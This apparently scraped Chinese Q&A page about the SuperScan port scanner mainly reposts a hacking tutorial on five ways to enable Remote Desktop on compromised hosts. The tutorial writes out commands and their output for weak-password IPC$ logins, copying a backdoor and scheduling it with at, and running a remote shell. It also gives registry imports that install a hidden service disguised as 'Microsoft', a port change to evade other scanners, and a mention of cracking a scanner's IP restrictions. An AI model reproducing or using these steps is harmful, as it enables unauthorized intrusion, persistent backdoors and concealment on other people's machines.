superscan為什麼沒有伺服器

A. 我的3389客戶端連接不到伺服器

[送給新手]5種方法開啟3389

五種辦法開啟3389終端!!(推薦)

（2004-06-05 17:41）
第一種方法：
==========================================================================================
使用的工具:
1:ipcscan掃描器
2:終端服務連接工具xpts.exe(WIN 2000/XP 終端連接程序. 內附有COPY 文件的補丁. 格式 IPort )
3:開終端的腳本rots.vbs(灰色軌跡zzzevazzz的作品)
4:cscript (在system32文件夾下;98操作系統可能沒有
二:步驟:
1:用ipcscan掃描弱口令(你們可以自己掃,我也掃到一些弱口令主機.演實時間我在論壇上再發)

2:用rots.vbs開啟終端服務

說明 cscript ROTS.vbs <目標IP> <用戶名> <密碼> [服務埠] [自動重起選項]

格式 cscript.exe rots.vbs ip user userpass port /r
或者 cscript.exe rots.vbs ip user userpass port /fr

三:常見問題:

1:腳本會判斷目標系統類型,如果不是server及以上版本,就會提示你是否要取消。因為pro版不能安裝終端服務.如果你確信腳本判斷錯誤,就繼續安裝好了.

2:可能會出現:Conneting 202.202.202.202 ....Error0x80070776 .Error description: 沒有發現指定的此對象導出者,這個還是放棄吧.

3:可能會連接不上,請用這個格式127.0.0.1:1818 1818是剛才開的埠.

==========================================================================================
第二種方法：
==========================================================================================
進入後：TELNET上去！

c:\>echo [Components] > c:\rock
c:\>echo TSEnable = on >> c:\rock
c:\>sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\rock /q
或者！
c:\>echo [Components] > d:\wawa
c:\>echo TSEnable = on >> d:\wawa
c:\>sysocmgr /i:c:\winnt\inf\sysoc.inf /u:d:\wawa /q
等會自動啟後就OK

或者：
在本地利用DOS命令edit建立.bat後綴批處理文件（文件名隨意） echo [Components] > c:\sql

echo TSEnable = on >>

c:\sqlsysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q

net use \\ip地址\ipc$ 密碼 /user:用戶名（一般默認:administrator)

利用at time 獲取對方伺服器時間。

路徑:\xxx.bat \\ip地址\$c:\winnt

at time 00:00:00 xxx.bat

伺服器執行命令後，伺服器將重新啟動，利用3389登陸就OK了！
==========================================================================================

第三種方法：
==========================================================================================
進入後,再次檢查終端組件是否安裝:
c:\>query user
這個工具需要安裝終端服務.

這樣就進一步確定了組件沒有被安裝.如果返回:
USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME
>w1 console 0 運行中 . 2002-1-12 22:5
\\類似這樣的信息,可能組件就已安裝.

好!都清楚了,可以開始安裝了.
---------------------------------------------------
C:\>dir c:\sysoc.inf /s //檢查INF文件的位置
c:\WINNT\inf 的目錄

2000-01-10 20:00 3,770 sysoc.inf
1 個文件 3,770 位元組
-----------------------------------------------------
C:\> dir c:\sysocmgr.* /s //檢查組件安裝程序
c:\WINNT\system32 的目錄

2000-01-10 20:00 42,768 sysocmgr.exe
1 個文件 42,768 位元組
-----------------------------------------------------
c:\>echo [Components] > c:\rock
c:\>echo TSEnable = on >> c:\rock
//這是建立無人參與的安裝參數
c:\>type c:\rock
[Components]
TSEnable = on
//檢查參數文件
------------------------------------------------------
c:\>sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\rock /q
-----------------------------------------------------

這一條就是真正安裝組件的命令.
以上這條命令沒有加/R參數,主機在安裝完後自動重起.
如若加了/R參數主機就不會重起.

如果一切正常的話,幾分鍾後對方主機將會離線,當它重新回來時,
3389終端服務就已經開啟.你就可以連上去了.

問題和建議:

A 在安裝過程中,不使用/R,有時主機也不會重起,你就要手動重起他,但在使用諸如:iisreset /reboot命令時,對方
的屏幕會出現個對話框,寫著誰引起的這次啟動,離重起還有多少秒.

B 一次不行可以再試一次,在實際中很有作用.

C 在輸入sysocmgr命令開始安裝時,一定不要把命令參數輸錯,那會在對方出現一個大的對話框,是sysocmgr的幫助,很是顯眼,
而且要求確定.在你的屏幕上是不會有任何反應的,你不會知道出錯，所以會有B的建議.

==========================================================================================
第四種方法：
==========================================================================================

C:\Documents and Settings\shanlu.XZGJDOMAIN>net use \\218.22.155.*\ipc$ "" /us
er:administrator----------------連接成功！
命令成功完成。

C:\Documents and Settings\shanlu.XZGJDOMAIN> wollf.exe \\218.22.155.*\admi
n$------------------------------拷貝wollf.exe到目標計算機的admin$目錄
已復制 1 個文件。

C:\Documents and Settings\shanlu.XZGJDOMAIN> hbulot.exe \\218.22.155.*\adm
in$-----------------------------拷貝hbulot.exe到目標計算機的admin$目錄
已復制 1 個文件。

C:\Documents and Settings\shanlu.XZGJDOMAIN>net time \\218.22.155.*
\\218.22.155.* 的當前時間是 2002/12/1 上午 06:37
命令成功完成。

C:\Documents and Settings\shanlu.XZGJDOMAIN>at \\218.22.155.* 06:39 wollf.exe
新加了一項作業，其作業 ID = 1--指定wollf.exe在06:39運行
------------------------------------------------------------------------------------------
說明：
wollf.exe是一個後門程序，很多高手都喜歡nc或者winshell，不過我對他情有獨鍾！在這里我只介紹與本文內

容有關的命令參數，它的高級用法不做補充。
hbulot.exe是用於開啟3389服務，如果不是server及以上版本，就不要運行了。因為pro版不能安裝終端服務。
2分鍾後......

------------------------------------------------------------------------------------------
C:\Documents and Settings\shanlu.XZGJDOMAIN>wollf -connect 218.22.155.* 7614
"Wollf Remote Manager" v1.6
Code by wollf, http://www.xfocus.org
------------------------------------------------------------------------------------------
說明：
使用wollf連接時要注意wollf.exe要在當前目錄，它的連接命令格式：wollf -connect IP 7614
7614是wollf開放的埠。如果顯示如上，說明你已經連接成功，並具有管理員administrator許可權。

------------------------------------------------------------------------------------------
[server@D:\WINNT\system32]#dos

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版權所有 1985-2000 Microsoft Corp.
------------------------------------------------------------------------------------------
說明：
輸入dos,你就會進入目標機的cmd下，這時同樣具有administrator許可權。

------------------------------------------------------------------------------------------
D:\WINNT\system32>cd..
cd..

D:\WINNT>dir h*.*
dir h*.*
驅動器 D 中的卷沒有標簽。
卷的序列號是 1CE5-2615

D:\WINNT 的目錄

2002-11-27 03:07 <DIR> Help
2002-09-10 12:16 10,752 hh.exe
2002-10-01 08:29 24,576 HBULOT.exe
2 個文件 35,328 位元組
1 個目錄 9,049,604,096 可用位元組

D:\WINNT>hbulot
hbulot
------------------------------------------------------------------------------------------
說明：
因為我們把HBULOT.exe放到目標機的admin$下的，所以先找到它，以上是文件的存放位置。

==========================================================================================
D:\WINNT>exit
exit

Command "DOS" succeed.

[server@D:\WINNT\system32]#reboot

Command "REBOOT" succeed.

[server@D:\WINNT\system32]#
Connection closed.
------------------------------------------------------------------------------------------
說明：
由dos退到wollf的連接模式下用exit命令，HBULOT.exe運行後需重新啟動方可生效，這里wollf自帶的REBOOT
命令，執行過在5秒後你就會失去連接。啟動完畢後檢查一下3389埠是否開放，方法很多，superscan3掃一下

。這時候你就可以登陸了。如果沒有開放3389那就不是server及以上版本，就不要運行了。因為pro版不能安裝

終端服務。

到這里，你已經擁有3389肉雞了！但是會不會被別的入侵者發現呢？下面所教的就是怎麼讓3389隻為你服務！

我們現在使用的3389登陸器有兩種版本，一種是2000/98，一種是XP。二者區別呢？前者使用的默認埠3389對

目標，後者默認的也是3389埠，但是它還支持別的埠進行連接！所以呢......我們來修改3389的連接埠

來躲過普通掃描器的掃描！修改方法如下：
修改伺服器端的埠設置 ，注冊表有2個地方需要修改。
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]
PortNumber值，默認是3389，修改成所希望的埠，比如1314
第二個地方：
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
PortNumber值，默認是3389，修改成所希望的埠，比如1314
現在這樣就可以了。重啟系統吧。
注意：事實上，只修改第二處也是可以的。另外，第二處的標准聯結應該是
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\<connection>
<connection>表示具體的某個RDP-TCP連結。
重啟過後，看看埠有沒有改。
小技巧：修改注冊表鍵值時，先選擇10進制，輸入你希望的埠數值，再選擇16進制，系統會自動轉換。

==========================================================================================
第五種方法：
==========================================================================================

一.原理性基本安裝
1.將如下注冊表鍵值導入 "肉機" 的注冊表中:

-------------

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache]
"Enabled"="0"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"ShutdownWithoutLogon"="0"

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
"EnableAdminTSRemote"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"TSEnabled"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD]
"Start"=dword:00000002

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
"Start"=dword:00000002

[HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle]
"Hotkey"="1"

-----------
2.重新起動"肉機"。

3.使用本地的3398客戶端，連接 "肉機" .

4.優(缺)點:

A."肉機"中 "控制面板-->添加/刪除程序-->添加/刪除 Windows 組件-->終端服務" 仍然處於未安裝狀態.
B."肉機"中 "開始-->程序-->管理工具" 沒有任何變動.
C."肉機"中 "開始-->程序-->管理工具-->服務-->Terminal Services" 變為 "已起動" 和"自動".
D."肉機"中 "Windows 任務管理器-->進程" 內,增加 "Termsrv.exe".

5.與"sysocmgr /iysoc.inf /u:u.txt /q" 的比較:

A."肉機"中 "控制面板-->添加/刪除程序-->添加/刪除 Windows 組件-->終端服務" 處於已安裝狀態.
B."肉機"中 "開始-->程序-->管理工具" 增加 "終端服務管理器","終端服務配置" 和 "終端服務客戶端生成器".
C."肉機"中 "開始-->程序-->管理工具-->服務-->Terminal Services" 變為 "已起動" 和"自動".
D."肉機"中 "Windows 任務管理器-->進程" 內,增加 "Termsrv.exe".
E.需要拷貝幾兆的文件到"肉機"中.

二.拋磚引玉性"隱蔽"安裝:

1.將"肉機"中 "c:\winnt\system32\termsrv.exe" 文件作一備份,命名為"eventlog.exe",仍將其放入目錄 "c:\winnt\system32\"

2.將如下注冊表鍵值導入 "肉機" 的注冊表中:

------------
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache]
"Enabled"="0"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"ShutdownWithoutLogon"="0"

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
"EnableAdminTSRemote"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"TSEnabled"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD]
"Start"=dword:00000002

[HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle]
"Hotkey"="1"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecuService]
"Start"=dword:00000002
"ErrorControl"=dword:00000001
"ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\
74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65,\
00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00
"ObjectName"="LocalSystem"
"Type"=dword:00000010
"Description"="Microsoft"
"DisplayName"="Microsoft"

---------------

3.重新起動"肉機"。

4.使用本地的3398客戶端，連接「肉機」。

5.優(缺)點:

A."肉機"中 "控制面板-->添加/刪除程序-->添加/刪除 Windows 組件-->終端服務" 仍然處於未安裝狀態.
B."肉機"中 "開始-->程序-->管理工具" 沒有任何變動.
C."肉機"中 "開始-->程序-->管理工具-->服務-->Terminal Services" 沒有變化,保持原始狀態.
D."肉機"中 "開始-->程序-->管理工具-->服務" 增加 "Microsoft"
E."肉機"中 "Windows 任務管理器-->進程" 內,增加 "eventlog.exe".

三.理論簡介

如此簡單? 只修改注冊表? 不需要拷貝W2k源文件?

讓我們從一條命令行語句說起,這條語句是: "sysocmgr /iysoc.inf /u:u.txt /q" . 其中 u.txt 如下:
-------------
[Components]
TsEnable = on
-------------

首先認識 "sysoc.inf"."sysoc.inf" 是安裝信息文件,位於 "c:\winnt\inf". 打開它,在 "[Components]" 節,找到與 "終端服務" 有關的條目:

"TerminalServices=TsOc.dll, HydraOc, TsOc.inf,,2"

這里引出另外一個安裝信息文件: "TsOc.inf". 這個文件同樣位於 "c:\winnt\inf".

打開這個文件,你會發現,如同 windows 環境下的軟體安裝, "終端服務" 的安裝, 也主要由三個部分: 拷貝源文件,注冊 DLL 以及修改注冊表.

在 [TerminalServices.FreshInstall] 節 和 "File Sections" 部分,你會發現 "終端服務" 所需的系統文件,DLL 和驅動, 隨同 W2k 的初始安裝,都已安然就位.

為什麼 "終端服務" 的常規安裝和命令行安裝都需要拷貝W2k源文件? 事實上,所拷貝的是"終端服務"客戶端軟體,既 "開始-->程序-->管理工具-->終端服務客戶端生成器" 生成客戶軟盤需要的文件.

各位 "黑友" 提供的包或工具,裡麵包括的W2k源文件,都是 "tsc32" 打頭的. 關連 "TsOc.inf" 的 "File Sections" 部分和另外一個文件 "c:\winnt\inf\layout.inf",你將會得到證實.

"終端服務"的安裝,需要注冊倆個 "DLL". 這倆個 "DLL" 同樣早早就住在系統里,想必它們一定也有了身份證.

"TsOc.inf" 文件一半的內容是關於修改注冊表. 但"終端服務" 需要的"Reg.AddToFreshInstall, Reg.AddTo50, Reg.AddTo40" 都是在系統安裝時注冊過的.

我們回頭看一下那個命令行語句, "/u:" 參數後面的無人職守安裝信息文件 "u.txt". "TsEnable = on" ?

"TsOc.inf" 文件 [Optional Components] 節中有三個選項, "TerminalServices", "TSEnable" ,"TSClients".

"TerminalServices" 如上所述,在系統初始安裝時,已經就序. "TSClients" 與 "終端服務" 沒有直接的關系.

我們在 "TsOc.inf" 找到 "[TsEnable]" 節. 此節中有用的信息只有一條 "ToggleOnSection = TerminalServices.ToggleOn". 再轉到 [TerminalServices.ToggleOn] 節.

[TerminalServices.ToggleOn] 節告訴我們,下一站是 "Reg.ToggleOn", 沿著這個線索,我們來到 [Reg.ToggleOn], 你看到什麼

----------------------------------------------

樓主的機器只需要下載一個3389的登陸器,地址如下:
http://www.wficp.com/soft/show.asp?id=22
參考資料：http://bbs.77169.org/read.php?fid=100&tid=68170&toread=1

B. 誰能告訴我superscan3.0怎麼用

打開主界面，默認為掃描（Scan）菜單，允許你輸入一個或多個主機名或IP范圍。你也可以選文件下的輸入地址列表。輸入主機名或IP范圍後開始掃描，點Play button，SuperScan開始掃描地址

掃描進程結束後，SuperScan將提供一個主機列表，關於每台掃描過的主機被發現的開放埠信息。SuperScan還有選擇以HTML格式顯示信息的功能。

關於主機和伺服器掃描設置（Host and Service Discovery）
到目前為止，從以上的例子，你已經能夠從一群主機中執行簡單的掃描，然而，很多時候需要你定製掃描。Host and Service Discovery 選項可以讓你在掃描的時候看到的更多信息。

在菜單頂部是Host Discovery項。默認的，發現主機的方法是通過重復請求（echo requests）。通過選擇和取消各種可選的掃描方式選項，你也能夠通過利用時間戳請求（timestamp），地址屏蔽請求（address mask requests）和消息請求（information requests）來發現主機。緊記，你選擇的選項越多，那麼掃描用的時間就越長。如果你正在試圖盡量多的收集一個明確的主機的信息，建議你首先執行一次常規的掃描以發現主機，然後再利用可選的請求選項來掃描。

在菜單的底部，包括UDP埠掃描和TCP埠掃描項。通過屏幕的截圖，注意到SuperScan最初開始掃描的僅僅是那幾個最普通的常用埠。原因是有超過65000個的TCP和UDP埠。若對每個可能開放埠的IP地址，進行超過130000次的埠掃描，那將需要多長的時間。因此 SuperScan最初開始掃描的僅僅是那幾個最普通的常用埠，但給你掃描額外埠的選項。

----
推薦2個新手用的 X-Scan 和 Fluxay(流光) ,都是中文版的,網上教程很多

流光這款軟體除了能夠像X-Scan那樣掃描眾多漏洞、弱口令外，還集成了常用的入侵工具，如字典工具、NT/IIS工具等，還獨創了能夠控制「肉雞」進行掃描的「流光Sensor工具」和為「肉雞」安裝服務的「種植者」工具。
與X-Scan相比，流光的功能多一些，但操作起來難免繁雜。由於流光的功能過於強大，而且功能還在不斷擴充中，因此流光的作者小榕限制了流光所能掃描的IP范圍，不允許流光掃描國內IP地址，而且流光測試版在功能上也有一定的限制。但是，入侵者為了能夠最大限度地使用流光，在使用流光之前，都需要用專門的破解程序對流光進行破解，去除IP范圍和功能上的限制。

C. 關於黑客方面的簡單問題，掃描工具SuperScan 3.0的使用

.......... 看那些所謂的 黑客動畫教程是沒用的 去書店買幾本書看吧

如果你手頭沒有好的掃 隨便去下一個S掃 +X-scan 玩玩找找感覺是可以的
運氣好的話還能掃到幾台 別去下那些掃雞的東東了 發出來幾本都是糊弄你玩的 再說你也沒有伺服器

Q49764 不懂+我問

D. 用superscan4漢化版掃IP的問題

不是你的問題，你要查的那台主機裝了防火牆，你所發送的數據包被他全部攔截了，他那邊的防火牆日誌一般都會記錄下，某某IP地址的對本主機進行了ping。
你可以把掃描的范圍擴大些，就會掃描到有漏洞的主機了。如果你懷疑自己的superscan4有問題可以掃描自己的機子試一試，說不定還能查出你機子的漏洞呢！
補充以下，我個人覺得3.0比superscan4好用。

E. superscan是一種埠掃描工具嗎

對.
SuperScan是windows平台下快速的埠掃描工具，可以快速掃描伺服器開放TCP埠/UDP埠。除此之外，它還附帶了一些其它功能，比如ip域名相互轉換、Ping 功能、驗證伺服器提供的服務類別等

F. superscan4 掃不出主機，但是可以ping通，為何

至於掃描我可以肯定的告訴你對你本機的系統有要求，不是像樓下說的防火牆問題，難道伺服器沒有防火牆嗎？為什麼還能掃到開放埠？你裝個虛擬機，裝個2003系統，你看他能不能掃？不能掃找我算賬！

G. 誰能教我用superscan來調DNS

這篇文章的內容大部分都是廢話，無非是誇耀長城多多牛B，只有這句：

「最好是看看自己撥號上去是什麼IP地址，比如你是211.162.68.*那麼你就該用211.162.68.3作DNS 」

是重點，按照這個方法做就行了。